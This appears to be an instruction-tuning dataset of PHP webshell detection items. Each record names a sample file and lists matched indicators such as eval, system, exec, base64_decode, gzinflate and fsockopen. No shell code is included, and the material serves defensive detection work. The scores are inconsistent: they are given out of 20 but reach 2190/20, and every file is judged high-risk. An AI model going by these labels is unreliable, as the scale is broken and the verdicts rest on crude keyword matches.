{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"load_shell.php\", \"文件类型\": \"php\", \"文件大小\": \"13380 bytes\", \"行数\": 513}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 108/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/load_shell.php", "malicious_score": 108, "md5_hash": "9987057e5fd0b19005a6172447d232a9"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"d9f5253d5f5a076ca02045e97895933e.php\", \"文件类型\": \"php\", \"文件大小\": \"7037 bytes\", \"行数\": 239}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_COOKIE[, fwrite(, eval(, $_POST[ 发现混淆技术: pack\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: file_put_contents, fwrite\\s*\\( 恶意度评分: 38/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/d9f5253d5f5a076ca02045e97895933e.php", "malicious_score": 38, "md5_hash": "55ad9309b006884f660c41e53150fc2e"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"3b9b8c8ad1f419991076fda11b6bcfdf.php\", \"文件类型\": \"php\", \"文件大小\": \"2592 bytes\", \"行数\": 60}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: Shell_Exec(, $_REQUEST[, $_GET[, Exec( 具备文件操作能力: move_uploaded_file 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/3b9b8c8ad1f419991076fda11b6bcfdf.php", "malicious_score": 13, "md5_hash": "77970bda2a9061e9f48385ea6cca0699"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"254aa81bd5e41fe535e7e691a9d59c2e.php\", \"文件类型\": \"php\", \"文件大小\": \"190502 bytes\", \"行数\": 3185}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, $_GET[, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 260/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/254aa81bd5e41fe535e7e691a9d59c2e.php", "malicious_score": 260, "md5_hash": "6595b8a404ab2ed20182fdd7bec587cd"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"5a59c8e89817687ef793e6881b03dfb5.php\", \"文件类型\": \"php\", \"文件大小\": \"160973 bytes\", \"行数\": 3112}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, $_GET[, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 248/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/5a59c8e89817687ef793e6881b03dfb5.php", "malicious_score": 248, "md5_hash": "d42faa5ce099000d3f19c2bcdb153be9"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"39ab6b7b4e9946f4fef4d99ee6be3446.php\", \"文件类型\": \"php\", \"文件大小\": \"5159 bytes\", \"行数\": 139}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, exec( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/39ab6b7b4e9946f4fef4d99ee6be3446.php", "malicious_score": 6, "md5_hash": "e3b461f7464d81f5022419d87315a90d"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"antichat.php\", \"文件类型\": \"php\", \"文件大小\": \"8998 bytes\", \"行数\": 180}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/antichat.php", "malicious_score": 48, "md5_hash": "40d0abceba125868be7f3f990f031521"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"22a7c70c641ccf897b77357f7f446189.php\", \"文件类型\": \"php\", \"文件大小\": \"117350 bytes\", \"行数\": 2500}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, gzinflate(, file_get_contents(, fwrite( 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 643/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/22a7c70c641ccf897b77357f7f446189.php", "malicious_score": 643, "md5_hash": "9fa6e5899e9cc8a868dfdaa31e2d58a0"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2eba6bfd79ceb61c7f9dcb3e85d9c597.php\", \"文件类型\": \"php\", \"文件大小\": \"520 bytes\", \"行数\": 23}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/2eba6bfd79ceb61c7f9dcb3e85d9c597.php", "malicious_score": 15, "md5_hash": "5b334d494564393f419af745dc1eeec7"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Worse.php\", \"文件类型\": \"php\", \"文件大小\": \"2455 bytes\", \"行数\": 69}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, system( 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/Worse.php", "malicious_score": 18, "md5_hash": "8338c8d9eab10bd38a7116eb534b5fa2"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"f2a5cca59823e0f005688047a4acba3d.php\", \"文件类型\": \"php\", \"文件大小\": \"66807 bytes\", \"行数\": 1533}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_POST[, exec(, system( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 824/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/f2a5cca59823e0f005688047a4acba3d.php", "malicious_score": 824, "md5_hash": "0ba2797e1efa862a3c1a246dfe12f7e5"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sadrazam.php\", \"文件类型\": \"php\", \"文件大小\": \"27964 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/sadrazam.php", "malicious_score": 8, "md5_hash": "48763bdd47801432650fa48ccb4508de"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fd72f22edad8211c625b8ebbb0e26f26.php\", \"文件类型\": \"php\", \"文件大小\": \"38744 bytes\", \"行数\": 935}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, exec(, system(, passthru( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 32/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/fd72f22edad8211c625b8ebbb0e26f26.php", "malicious_score": 32, "md5_hash": "d7f42d446c52591e0760e5760c33080f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"e6c9c079cf937c45feab4dfd342eb2ba.php\", \"文件类型\": \"php\", \"文件大小\": \"57396 bytes\", \"行数\": 42}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: str_rot13(, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, str_rot13 包含网络功能: wget 恶意度评分: 19/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/e6c9c079cf937c45feab4dfd342eb2ba.php", "malicious_score": 19, "md5_hash": "0911b6e6b8f4bcb05599b2885a7fe8a8"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.php\", \"文件类型\": \"php\", \"文件大小\": \"48668 bytes\", \"行数\": 1213}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, $_POST[ 发现混淆技术: base64_decode 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 256/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/devilzShell.php", "malicious_score": 256, "md5_hash": "02e8597a4ddade7b69f6fa546ebfe170"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"8643b39116d592e569e531e528934ebe.php\", \"文件类型\": \"php\", \"文件大小\": \"225 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, create_function( 发现混淆技术: pack\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/8643b39116d592e569e531e528934ebe.php", "malicious_score": 8, "md5_hash": "ea40787c13033f8799c263a5e47dbc73"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"6d2983f847596d38c9550867394ce92a.php\", \"文件类型\": \"php\", \"文件大小\": \"68300 bytes\", \"行数\": 200}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/6d2983f847596d38c9550867394ce92a.php", "malicious_score": 8, "md5_hash": "6ab5e329bf6e0060d9f494beb4d22bb4"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"miansha.php\", \"文件类型\": \"php\", \"文件大小\": \"60964 bytes\", \"行数\": 1308}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, fwrite(, $_COOKIE[ 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 296/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/miansha.php", "malicious_score": 296, "md5_hash": "57fdd491deb77a01441ba9aaec3a0209"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"e10ab13dbc8dff457cea7880006d6515.php\", \"文件类型\": \"php\", \"文件大小\": \"146412 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: str_rot13(, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate, str_rot13 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/e10ab13dbc8dff457cea7880006d6515.php", "malicious_score": 18, "md5_hash": "e0d3b34fbe71a77133951e0f0ff1de4b"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b4f5bdf68cc31d9a73cec13a20cde9f4.php\", \"文件类型\": \"php\", \"文件大小\": \"174864 bytes\", \"行数\": 2151}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, str_rot13(, file_get_contents(, $_GET[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 2190/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/b4f5bdf68cc31d9a73cec13a20cde9f4.php", "malicious_score": 2190, "md5_hash": "d01144c04e7a46870a8dd823eb2fe5c8"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"d6e70605066657c81ad6b99009d7a5cd.php\", \"文件类型\": \"php\", \"文件大小\": \"35329 bytes\", \"行数\": 1033}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, $_COOKIE[, eval(, $_POST[ 具备文件操作能力: mkdir\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 148/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/d6e70605066657c81ad6b99009d7a5cd.php", "malicious_score": 148, "md5_hash": "f532645418b3383707936eeda6971daa"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ad453c936c79bddce47b5ee58a49ee47.php\", \"文件类型\": \"php\", \"文件大小\": \"12817 bytes\", \"行数\": 371}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: Eval(, $_REQUEST[, $_GET[, fwrite(, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 77/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/ad453c936c79bddce47b5ee58a49ee47.php", "malicious_score": 77, "md5_hash": "47309b6b6045618ccc87b49074594038"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"lamashell.php\", \"文件类型\": \"php\", \"文件大小\": \"2480 bytes\", \"行数\": 89}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 具备文件操作能力: move_uploaded_file 恶意度评分: 19/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/lamashell.php", "malicious_score": 19, "md5_hash": "de9abc2e38420cad729648e93dfc6687"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1b46895407f38bb88716f0dd7f7dfd78.php\", \"文件类型\": \"php\", \"文件大小\": \"21397 bytes\", \"行数\": 907}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, fwrite(, system(, $_POST[ 具备文件操作能力: fopen\\s*\\(, move_uploaded_file, unlink\\s*\\( 恶意度评分: 124/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/1b46895407f38bb88716f0dd7f7dfd78.php", "malicious_score": 124, "md5_hash": "d93c62a0a042252f7531d8632511ca56"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mini.php\", \"文件类型\": \"php\", \"文件大小\": \"25909 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_GET[, $_POST[, file_get_contents( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 118/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/mini.php", "malicious_score": 118, "md5_hash": "c3791f16af5e094d10883bc98833d10d"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso_404.php\", \"文件类型\": \"php\", \"文件大小\": \"107566 bytes\", \"行数\": 2016}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_POST[, exec(, system( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 906/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/wso_404.php", "malicious_score": 906, "md5_hash": "57416250665fce5a75cf937662bd0189"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b0e4bdfca013a84e5f0b9bc9ae028945.php\", \"文件类型\": \"php\", \"文件大小\": \"320 bytes\", \"行数\": 25}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/b0e4bdfca013a84e5f0b9bc9ae028945.php", "malicious_score": 9, "md5_hash": "c38ae5ba61fd84f6bbbab98d89d8a346"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"9903ce9dcc1a3c6e66aa239338d6f028.php\", \"文件类型\": \"php\", \"文件大小\": \"31218 bytes\", \"行数\": 274}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/9903ce9dcc1a3c6e66aa239338d6f028.php", "malicious_score": 6, "md5_hash": "0723362e176328b2e98e99ac6cc17884"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SpecialShell_99.php\", \"文件类型\": \"php\", \"文件大小\": \"133225 bytes\", \"行数\": 2822}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 394/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/SpecialShell_99.php", "malicious_score": 394, "md5_hash": "f345636fe0994158d9d49c7fded0171f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"0404dbcece15a8125040fb691302eef8.php\", \"文件类型\": \"php\", \"文件大小\": \"93545 bytes\", \"行数\": 17}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/0404dbcece15a8125040fb691302eef8.php", "malicious_score": 8, "md5_hash": "6842841f4b74c9a451548baa08fafa2a"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bat.php\", \"文件类型\": \"php\", \"文件大小\": \"128816 bytes\", \"行数\": 3871}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: fsockopen, socket_create, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 626/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/bat.php", "malicious_score": 626, "md5_hash": "ff49b27607f1622e63b73228c6f14198"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"5fe2d28db302b8d5b0ccb7ddc50992fd.php\", \"文件类型\": \"php\", \"文件大小\": \"110266 bytes\", \"行数\": 107}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/5fe2d28db302b8d5b0ccb7ddc50992fd.php", "malicious_score": 13, "md5_hash": "873a04ad80625d59f6cd8be832399172"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ak74shell.php\", \"文件类型\": \"php\", \"文件大小\": \"57390 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, eval(, passthru( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 150/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/ak74shell.php", "malicious_score": 150, "md5_hash": "36fc307d3c9c9f4266219184eed07ffa"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2e8d3bf70d3d7eceb33859459b18c40b.php\", \"文件类型\": \"php\", \"文件大小\": \"56734 bytes\", \"行数\": 1616}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 61/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/2e8d3bf70d3d7eceb33859459b18c40b.php", "malicious_score": 61, "md5_hash": "9bd9880089256dca5bf7e295961536ca"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ac98bd405c6cf61a5bea76308cb9ab10.php\", \"文件类型\": \"php\", \"文件大小\": \"44342 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/ac98bd405c6cf61a5bea76308cb9ab10.php", "malicious_score": 13, "md5_hash": "9e4b767e9c70b275f7e57e4314862883"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"stest-minimized.php\", \"文件类型\": \"php\", \"文件大小\": \"3188 bytes\", \"行数\": 129}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, exec(, system(, eval(, passthru( 包含网络功能: curl_exec 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 44/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/stest-minimized.php", "malicious_score": 44, "md5_hash": "4f71ce0cf112207fc7730784c614ca13"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"f1bf35ceeea62e2f4a9206ef63b9ebcc.php\", \"文件类型\": \"php\", \"文件大小\": \"8101 bytes\", \"行数\": 222}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, shell_exec(, exec( 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/f1bf35ceeea62e2f4a9206ef63b9ebcc.php", "malicious_score": 18, "md5_hash": "95692fec61bb1ede305880ab282b53ec"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ab96a8103d9540a975110f605a2d9c49.php\", \"文件类型\": \"php\", \"文件大小\": \"63228 bytes\", \"行数\": 1410}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, fwrite(, $_POST[, exec( 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, mkdir\\s*\\( 恶意度评分: 258/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/ab96a8103d9540a975110f605a2d9c49.php", "malicious_score": 258, "md5_hash": "cc936ecf428d902a3e47569a647c7323"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"571d8511e9a5932f61747ae0d4760c14.php\", \"文件类型\": \"php\", \"文件大小\": \"15005 bytes\", \"行数\": 38}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/571d8511e9a5932f61747ae0d4760c14.php", "malicious_score": 16, "md5_hash": "ced050df5ca42064056a7ad610a191b3"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"nst.php\", \"文件类型\": \"php\", \"文件大小\": \"81162 bytes\", \"行数\": 2136}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, exec(, eval( 发现混淆技术: base64_decode 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 765/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/nst.php", "malicious_score": 765, "md5_hash": "c0f9bc41a886604d4ce9a40064caac26"}}
